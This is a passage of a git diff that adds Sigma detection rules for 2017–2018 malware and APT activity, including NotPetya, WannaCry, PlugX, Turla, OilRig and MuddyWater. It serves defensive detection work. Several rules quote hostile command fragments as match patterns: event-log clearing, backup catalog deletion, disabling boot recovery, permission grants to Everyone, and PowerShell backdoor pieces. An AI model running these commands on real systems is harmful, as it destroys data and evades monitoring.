b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/Fireball/proc_creation_win_malware_fireball.yml new file mode 100644 index 000000000..b358483bc --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/Fireball/proc_creation_win_malware_fireball.yml @@ -0,0 +1,34 @@ +title: Fireball Archer Install +id: 3d4aebe0-6d29-45b2-a8a4-3dfde586a26d +status: test +description: Detects Archer malware invocation via rundll32 +references: + - https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/ + - https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100 +author: Florian Roth (Nextron Systems) +date: 2017/06/03 +modified: 2021/11/27 +tags: + - attack.execution + - attack.defense_evasion + - attack.t1218.011 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains|all: + - rundll32.exe + - InstallArcherSvc + condition: process_creation and selection +fields: + - CommandLine + - ParentCommandLine +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/NotPetya/proc_creation_win_malware_notpetya.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/NotPetya/proc_creation_win_malware_notpetya.yml new file mode 100644 index 000000000..2298b7966 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/NotPetya/proc_creation_win_malware_notpetya.yml @@ -0,0 +1,42 @@ +title: NotPetya Ransomware Activity +id: 79aeeb41-8156-4fac-a0cd-076495ab82a1 +status: test +description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil +references: + - https://securelist.com/schroedingers-petya/78870/ + - https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100 +author: Florian Roth (Nextron Systems), Tom Ueltschi +date: 2019/01/16 +modified: 2022/12/15 +tags: + - attack.defense_evasion + - attack.t1218.011 + - attack.t1070.001 + - attack.credential_access + - attack.t1003.001 + - car.2016-04-002 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_specific_pattern: + CommandLine|contains: + - 'wevtutil cl Application & fsutil usn deletejournal /D C:' + - dllhost.dat %WINDIR%\ransoms + selection_rundll32: + CommandLine|endswith: + - .dat,#1 + - '.dat #1' # Sysmon removes comma + - .zip.dll",#1 + NewProcessName|endswith: \rundll32.exe + selection_perfc_keyword: + - \perfc.dat + condition: process_creation and (1 of selection_*) +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/PlugX/proc_creation_win_malware_plugx_susp_exe_locations.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/PlugX/proc_creation_win_malware_plugx_susp_exe_locations.yml new file mode 100644 index 000000000..72958fbd3 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/PlugX/proc_creation_win_malware_plugx_susp_exe_locations.yml @@ -0,0 +1,101 @@ +title: Potential PlugX Activity +id: aeab5ec5-be14-471a-80e8-e344418305c2 +status: test +description: Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location +references: + - http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/ + - https://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/ +author: Florian Roth (Nextron Systems) +date: 2017/06/12 +modified: 2023/02/03 +tags: + - attack.s0013 + - attack.defense_evasion + - attack.t1574.002 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_cammute: + NewProcessName|endswith: \CamMute.exe + filter_cammute: + NewProcessName|contains: + - \Lenovo\Communication Utility\ + - \Lenovo\Communications Utility\ + selection_chrome_frame: + NewProcessName|endswith: \chrome_frame_helper.exe + filter_chrome_frame: + NewProcessName|contains: \Google\Chrome\application\ + selection_devemu: + NewProcessName|endswith: \dvcemumanager.exe + filter_devemu: + NewProcessName|contains: \Microsoft Device Emulator\ + selection_gadget: + NewProcessName|endswith: \Gadget.exe + filter_gadget: + NewProcessName|contains: \Windows Media Player\ + selection_hcc: + NewProcessName|endswith: \hcc.exe + filter_hcc: + NewProcessName|contains: \HTML Help Workshop\ + selection_hkcmd: + NewProcessName|endswith: \hkcmd.exe + filter_hkcmd: + NewProcessName|contains: + - \System32\ + - \SysNative\ + - \SysWow64\ + selection_mc: + NewProcessName|endswith: \Mc.exe + filter_mc: + NewProcessName|contains: + - \Microsoft Visual Studio + - \Microsoft SDK + - \Windows Kit + selection_msmpeng: + NewProcessName|endswith: \MsMpEng.exe + filter_msmpeng: + NewProcessName|contains: + - \Microsoft Security Client\ + - \Windows Defender\ + - \AntiMalware\ + selection_msseces: + NewProcessName|endswith: \msseces.exe + filter_msseces: + NewProcessName|contains: + - \Microsoft Security Center\ + - \Microsoft Security Client\ + - \Microsoft Security Essentials\ + selection_oinfo: + NewProcessName|endswith: \OInfoP11.exe + filter_oinfo: + NewProcessName|contains: \Common Files\Microsoft Shared\ + selection_oleview: + NewProcessName|endswith: \OleView.exe + filter_oleview: + NewProcessName|contains: + - \Microsoft Visual Studio + - \Microsoft SDK + - \Windows Kit + - \Windows Resource Kit\ + selection_rc: + NewProcessName|endswith: \rc.exe + filter_rc: + NewProcessName|contains: + - \Microsoft Visual Studio + - \Microsoft SDK + - \Windows Kit + - \Windows Resource Kit\ + - \Microsoft.NET\ + condition: process_creation and (( selection_cammute and not filter_cammute ) or ( selection_chrome_frame and not filter_chrome_frame ) or ( selection_devemu and not filter_devemu ) or ( selection_gadget and not filter_gadget ) or ( selection_hcc and not filter_hcc ) or ( selection_hkcmd and not filter_hkcmd ) or ( selection_mc and not filter_mc ) or ( selection_msmpeng and not filter_msmpeng ) or ( selection_msseces and not filter_msseces ) or ( selection_oinfo and not filter_oinfo ) or ( selection_oleview and not filter_oleview ) or ( selection_rc and not filter_rc )) +fields: + - CommandLine + - ParentCommandLine +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/StoneDrill/win_system_apt_stonedrill.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/StoneDrill/win_system_apt_stonedrill.yml new file mode 100644 index 000000000..500915c03 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/StoneDrill/win_system_apt_stonedrill.yml @@ -0,0 +1,30 @@ +title: StoneDrill Service Install +id: 9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6 +status: test +description: This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky +references: + - https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/ +author: Florian Roth (Nextron Systems) +date: 2017/03/07 +modified: 2021/11/30 +tags: + - attack.persistence + - attack.g0064 + - attack.t1543.003 + - detection.emerging_threats +logsource: + product: windows + service: system +detection: + system: + Channel: System + selection: + Provider_Name: Service Control Manager + EventID: 7045 + ServiceName: NtsSrv + ImagePath|endswith: ' LocalService' + condition: system and selection +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/WannaCry/proc_creation_win_malware_wannacry.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/WannaCry/proc_creation_win_malware_wannacry.yml new file mode 100644 index 000000000..00656f3da --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/WannaCry/proc_creation_win_malware_wannacry.yml @@ -0,0 +1,68 @@ +title: WannaCry Ransomware Activity +id: 41d40bff-377a-43e2-8e1b-2e543069e079 +status: test +description: Detects WannaCry ransomware activity +references: + - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100 +author: Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro +date: 2019/01/16 +modified: 2023/02/03 +tags: + - attack.lateral_movement + - attack.t1210 + - attack.discovery + - attack.t1083 + - attack.defense_evasion + - attack.t1222.001 + - attack.impact + - attack.t1486 + - attack.t1490 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection1: + - NewProcessName|endswith: + - \tasksche.exe + - \mssecsvc.exe + - \taskdl.exe + - \taskhsvc.exe + - \taskse.exe + - \111.exe + - \lhdfrgui.exe + # - '\diskpart.exe' # cannot be used in a rule of level critical + - \linuxnew.exe + - \wannacry.exe + - NewProcessName|contains: WanaDecryptor + selection2: + - CommandLine|contains|all: + - icacls + - /grant + - Everyone:F + - /T + - /C + - /Q + - CommandLine|contains|all: + - bcdedit + - /set + - '{default}' + - recoveryenabled + - no + - CommandLine|contains|all: + - wbadmin + - delete + - catalog + - -quiet + - CommandLine|contains: '@Please_Read_Me@.txt' + condition: process_creation and (1 of selection*) +fields: + - CommandLine + - ParentCommandLine +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/APT10/proc_creation_win_apt_apt10_cloud_hopper.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/APT10/proc_creation_win_apt_apt10_cloud_hopper.yml new file mode 100644 index 000000000..c0ca40cf5 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/APT10/proc_creation_win_apt_apt10_cloud_hopper.yml @@ -0,0 +1,33 @@ +title: Potential APT10 Cloud Hopper Activity +id: 966e4016-627f-44f7-8341-f394905c361f +status: test +description: Detects potential process and execution activity related to APT10 Cloud Hopper operation +references: + - https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf +author: Florian Roth (Nextron Systems) +date: 2017/04/07 +modified: 2023/03/08 +tags: + - attack.execution + - attack.g0045 + - attack.t1059.005 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_cscript: + CommandLine|contains: '.vbs /shell ' + NewProcessName|endswith: \cscript.exe + selection_csvde: + CommandLine|contains|all: + - csvde -f C:\windows\web\ + - .log + condition: process_creation and (1 of selection_*) +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Dragonfly/proc_creation_win_apt_ta17_293a_ps.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Dragonfly/proc_creation_win_apt_ta17_293a_ps.yml new file mode 100644 index 000000000..7464fa4f8 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Dragonfly/proc_creation_win_apt_ta17_293a_ps.yml @@ -0,0 +1,31 @@ +title: Ps.exe Renamed SysInternals Tool +id: 18da1007-3f26-470f-875d-f77faf1cab31 +status: test +description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report +references: + - https://www.us-cert.gov/ncas/alerts/TA17-293A +author: Florian Roth (Nextron Systems) +date: 2017/10/22 +modified: 2023/05/02 +tags: + - attack.defense_evasion + - attack.g0035 + - attack.t1036.003 + - car.2013-05-009 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains|all: + - ps.exe -accepteula + - -s cmd /c netstat + condition: process_creation and selection +falsepositives: + - Renamed SysInternals tool +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Lazarus/proc_creation_win_apt_lazarus_binary_masquerading.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Lazarus/proc_creation_win_apt_lazarus_binary_masquerading.yml new file mode 100644 index 000000000..d20bd4338 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Lazarus/proc_creation_win_apt_lazarus_binary_masquerading.yml @@ -0,0 +1,33 @@ +title: Lazarus System Binary Masquerading +id: 3f7f5b0b-5b16-476c-a85f-ab477f6dd24b +status: test +description: Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location +references: + - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf +author: Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1) +date: 2020/06/03 +modified: 2023/03/10 +tags: + - attack.defense_evasion + - attack.t1036.005 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + NewProcessName|endswith: + - \msdtc.exe + - \gpsvc.exe + filter: + NewProcessName|startswith: + - C:\Windows\System32\ + - C:\Windows\SysWOW64\ + condition: process_creation and (selection and not filter) +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Turla/win_system_apt_carbonpaper_turla.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Turla/win_system_apt_carbonpaper_turla.yml new file mode 100644 index 000000000..aa7b7a3a4 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Turla/win_system_apt_carbonpaper_turla.yml @@ -0,0 +1,32 @@ +title: Turla Service Install +id: 1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4 +status: test +description: This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET +references: + - https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/ +author: Florian Roth (Nextron Systems) +date: 2017/03/31 +modified: 2021/11/30 +tags: + - attack.persistence + - attack.g0010 + - attack.t1543.003 + - detection.emerging_threats +logsource: + product: windows + service: system +detection: + system: + Channel: System + selection: + Provider_Name: Service Control Manager + EventID: 7045 + ServiceName: + - srservice + - ipvpn + - hkmsvc + condition: system and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Turla/win_system_apt_turla_service_png.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Turla/win_system_apt_turla_service_png.yml new file mode 100644 index 000000000..47e6633a7 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Turla/win_system_apt_turla_service_png.yml @@ -0,0 +1,29 @@ +title: Turla PNG Dropper Service +id: 1228f8e2-7e79-4dea-b0ad-c91f1d5016c1 +status: test +description: This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018 +references: + - https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/ +author: Florian Roth (Nextron Systems) +date: 2018/11/23 +modified: 2021/11/30 +tags: + - attack.persistence + - attack.g0010 + - attack.t1543.003 + - detection.emerging_threats +logsource: + product: windows + service: system +detection: + system: + Channel: System + selection: + Provider_Name: Service Control Manager + EventID: 7045 + ServiceName: WerFaultSvc + condition: system and selection +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2018/Malware/Elise-Backdoor/proc_creation_win_malware_elise.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/Malware/Elise-Backdoor/proc_creation_win_malware_elise.yml new file mode 100644 index 000000000..57766516e --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/Malware/Elise-Backdoor/proc_creation_win_malware_elise.yml @@ -0,0 +1,41 @@ +title: Elise Backdoor Activity +id: e507feb7-5f73-4ef6-a970-91bb6f6d744f +status: test +description: Detects Elise backdoor activity used by APT32 +references: + - https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting + - https://web.archive.org/web/20200302083912/https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf +author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +date: 2018/01/31 +modified: 2023/03/09 +tags: + - attack.g0030 + - attack.g0050 + - attack.s0081 + - attack.execution + - attack.t1059.003 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_other_svchost: + NewProcessName|endswith: \Microsoft\Network\svchost.exe + selection_other_del: + CommandLine|contains|all: + - \Windows\Caches\NavShExt.dll + - /c del + selection_dll_path: + CommandLine|endswith: + - \AppData\Roaming\MICROS~1\Windows\Caches\NavShExt.dll + - \AppData\Roaming\Microsoft\Windows\Caches\NavShExt.dll + selection_dll_function: + CommandLine|contains: ',Setting' + condition: process_creation and (1 of selection_other_* or all of selection_dll_*) +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/APT27/proc_creation_win_apt_apt27_emissary_panda.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/APT27/proc_creation_win_apt_apt27_emissary_panda.yml new file mode 100644 index 000000000..8faf6d754 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/APT27/proc_creation_win_apt_apt27_emissary_panda.yml @@ -0,0 +1,35 @@ +title: APT27 - Emissary Panda Activity +id: 9aa01d62-7667-4d3b-acb8-8cb5103e2014 +status: test +description: Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27 +references: + - https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965 + - https://twitter.com/cyb3rops/status/1168863899531132929 + - https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/ +author: Florian Roth (Nextron Systems) +date: 2018/09/03 +modified: 2023/03/09 +tags: + - attack.defense_evasion + - attack.t1574.002 + - attack.g0027 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_sllauncher: + ParentProcessName|endswith: \sllauncher.exe + NewProcessName|endswith: \svchost.exe + selection_svchost: + CommandLine|contains: -k + ParentProcessName|contains: \AppData\Roaming\ + NewProcessName|endswith: \svchost.exe + condition: process_creation and (1 of selection_*) +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/APT28/proc_creation_win_apt_sofacy.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/APT28/proc_creation_win_apt_sofacy.yml new file mode 100644 index 000000000..53137427f --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/APT28/proc_creation_win_apt_sofacy.yml @@ -0,0 +1,44 @@ +title: Sofacy Trojan Loader Activity +id: ba778144-5e3d-40cf-8af9-e28fb1df1e20 +status: test +description: Detects Trojan loader activity as used by APT28 +references: + - https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/ + - https://www.hybrid-analysis.com/sample/ff808d0a12676bfac88fd26f955154f8884f2bb7c534b9936510fd6296c543e8?environmentId=110 + - https://twitter.com/ClearskySec/status/960924755355369472 +author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community +date: 2018/03/01 +modified: 2023/05/31 +tags: + - attack.defense_evasion + - attack.execution + - attack.g0007 + - attack.t1059.003 + - attack.t1218.011 + - car.2013-10-002 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_path: + CommandLine|contains: + - '%LOCALAPPDATA%' + - \AppData\Local\ + NewProcessName|endswith: \rundll32.exe + selection_extensions: + - CommandLine|contains: .dat", + - CommandLine|endswith: + - '.dll #1' + - '.dll" #1' + - .dll",#1 + filter_main_exclude_temp: + CommandLine|contains: \AppData\Local\Temp\ + condition: process_creation and (all of selection_* and not 1 of filter_main_*) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/APT29-CozyBear/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/APT29-CozyBear/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml new file mode 100644 index 000000000..eaf3596f7 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/APT29-CozyBear/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml @@ -0,0 +1,35 @@ +title: APT29 2018 Phishing Campaign CommandLine Indicators +id: 7453575c-a747-40b9-839b-125a0aae324b +related: + - id: 033fe7d6-66d1-4240-ac6b-28908009c71f + type: obsoletes +status: stable +description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant +references: + - https://twitter.com/DrunkBinary/status/1063075530180886529 + - https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/ + - https://www.mandiant.com/resources/blog/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign +author: Florian Roth (Nextron Systems), @41thexplorer +date: 2018/11/20 +modified: 2023/03/08 +tags: + - attack.execution + - attack.t1218.011 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + - CommandLine|contains: -noni -ep bypass $ + - CommandLine|contains|all: + - cyzfc.dat, + - PointFunctionCall + condition: process_creation and selection +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/MuddyWater/proc_creation_win_apt_muddywater_activity.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/MuddyWater/proc_creation_win_apt_muddywater_activity.yml new file mode 100644 index 000000000..fe8c82050 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/MuddyWater/proc_creation_win_apt_muddywater_activity.yml @@ -0,0 +1,44 @@ +title: Potential MuddyWater APT Activity +id: 36222790-0d43-4fe8-86e4-674b27809543 +status: test +description: Detects potential Muddywater APT activity +references: + - https://www.mandiant.com/resources/blog/iranian-threat-group-updates-ttps-in-spear-phishing-campaign +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/03/10 +tags: + - attack.defense_evasion + - attack.execution + - attack.g0069 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_mshta: + CommandLine|contains|all: + - vbscript:Close(Execute("CreateObject( + - powershell + - -w 1 -exec Bypass + - \ProgramData\ + selection_survey: + CommandLine|contains|all: + - Win32_OperatingSystem + - Win32_NetworkAdapterConfiguration + - root\SecurityCenter2 + - '[System.Net.DNS]' + selection_pwsh_backdoor: + CommandLine|contains|all: + - '[Convert]::ToBase64String' + - '[System.Text.Encoding]::UTF8.GetString]' + - GetResponse().GetResponseStream() + - '[System.Net.HttpWebRequest]::Create(' + - '-bxor ' + condition: process_creation and (1 of selection_*) +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/OilRig/proc_creation_win_apt_oilrig_mar18.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/OilRig/proc_creation_win_apt_oilrig_mar18.yml new file mode 100644 index 000000000..643823ade --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/OilRig/proc_creation_win_apt_oilrig_mar18.yml @@ -0,0 +1,56 @@ +title: OilRig APT Activity +id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 +related: + - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 # System + type: similar + - id: c0580559-a6bd-4ef6-b9b7-83703d98b561 # Security + type: similar + - id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 # Registry + type: similar +status: test +description: Detects OilRig activity as reported by Nyotron in their March 2018 report +references: + - https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf +author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community +date: 2018/03/23 +modified: 2023/03/08 +tags: + - attack.persistence + - attack.g0049 + - attack.t1053.005 + - attack.s0111 + - attack.t1543.003 + - attack.defense_evasion + - attack.t1112 + - attack.command_and_control + - attack.t1071.004 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_schtasks: + CommandLine|contains|all: + - SC Scheduled Scan + - \microsoft\Taskbar\autoit3.exe + selection_temp: + NewProcessName|contains: \Windows\Temp\DB\ + NewProcessName|endswith: .exe + selection_service: + CommandLine|contains: + - i + - u + NewProcessName: C:\Windows\system32\Service.exe + selection_autoit: + CommandLine|contains|all: + - nslookup.exe + - -q=TXT + ParentProcessName|endswith: \local\microsoft\Taskbar\autoit3.exe + condition: process_creation and (1 of selection_*) +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/OilRig/win_security_apt_oilrig_mar18.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/OilRig/win_security_apt_oilrig_mar18.yml new file mode 100644 index 000000000..ebee13389 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/OilRig/win_security_apt_oilrig_mar18.yml @@ -0,0 +1,43 @@ +title: OilRig APT Schedule Task Persistence - Security +id: c0580559-a6bd-4ef6-b9b7-83703d98b561 +related: + - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 # System + type: similar + - id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 # Registry + type: similar + - id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 # ProcessCreation + type: similar +status: test +description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report +references: + - https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf +author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community +date: 2018/03/23 +modified: 2023/03/08 +tags: + - attack.persistence + - attack.g0049 + - attack.t1053.005 + - attack.s0111 + - attack.t1543.003 + - attack.defense_evasion + - attack.t1112 + - attack.command_and_control + - attack.t1071.004 + - detection.emerging_threats +logsource: + product: windows + service: security +detection: + security: + Channel: Security + selection_service: + EventID: 4698 + TaskName: + - SC Scheduled Scan + - UpdatMachine + condition: security and selection_service +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/OilRig/win_system_apt_oilrig_mar18.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/OilRig/win_system_apt_oilrig_mar18.yml new file mode 100644 index 000000000..608674039 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/OilRig/win_system_apt_oilrig_mar18.yml @@ -0,0 +1,44 @@ +title: OilRig APT Schedule Task Persistence - System +id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 +related: + - id: c0580559-a6bd-4ef6-b9b7-83703d98b561 # Security + type: similar + - id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 # Registry + type: similar + - id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 # ProcessCreation + type: similar +status: experimental +description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report +references: + - https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf +author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community +date: 2018/03/23 +modified: 2023/03/08 +tags: + - attack.persistence + - attack.g0049 + - attack.t1053.005 + - attack.s0111 + - attack.t1543.003 + - attack.defense_evasion + - attack.t1112 + - attack.command_and_control + - attack.t1071.004 + - detection.emerging_threats +logsource: + product: windows + service: system +detection: + system: + Channel: System + selection: + Provider_Name: Service Control Manager + EventID: 7045 + ServiceName: + - SC Scheduled Scan + - UpdatMachine + condition: system and selection +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/Slingshot/proc_creation_win_apt_slingshot.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/Slingshot/proc_creation_win_apt_slingshot.yml new file mode 100644 index 000000000..ca39ec945 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/Slingshot/proc_creation_win_apt_slingshot.yml @@ -0,0 +1,34 @@ +title: Defrag Deactivation +id: 958d81aa-8566-4cea-a565-59ccd4df27b0 +status: test +description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group +references: + - https://securelist.com/apt-slingshot/84312/ +author: Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1) +date: 2019/03/04 +modified: 2022/10/09 +tags: + - attack.persistence + - attack.t1053.005 + - attack.s0111 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: + - /delete + - /change + CommandLine|contains|all: + - /TN + - \Microsoft\Windows\Defrag\ScheduledDefrag + NewProcessName|endswith: \schtasks.exe + condition: process_creation and selection +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/Slingshot/win_security_apt_slingshot.yml 